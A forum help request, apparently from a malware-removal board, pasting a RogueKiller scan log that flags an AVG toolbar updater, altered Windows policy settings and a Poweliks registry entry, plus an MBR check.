[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: +++++
--- User ---
[MBR] ba1a3232ec89787f10919ba57328124e
[BSP] fe60953779c108c83b83ccd2d5a74b27 : Lenovo MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1200 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2459648 | Size: 227272 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 467914752 | Size: 10000 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )


============================================
RKreport_SCN_11032014_211524.log

We await your help. thank you




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users